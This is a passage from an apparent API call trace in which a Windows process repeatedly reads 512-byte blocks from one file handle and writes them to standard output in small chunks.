(hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.837] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.838] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] GetFileType (hFile=0x50) returned 0x1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.838] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.839] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.839] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.840] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.840] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] GetFileType (hFile=0x50) returned 0x1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.840] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.841] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.841] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] GetFileType (hFile=0x50) returned 0x1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] GetFileType (hFile=0x50) returned 0x1 [0149.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.843] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.843] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] GetFileType (hFile=0x50) returned 0x1 [0149.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] GetFileType (hFile=0x50) returned 0x1 [0149.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 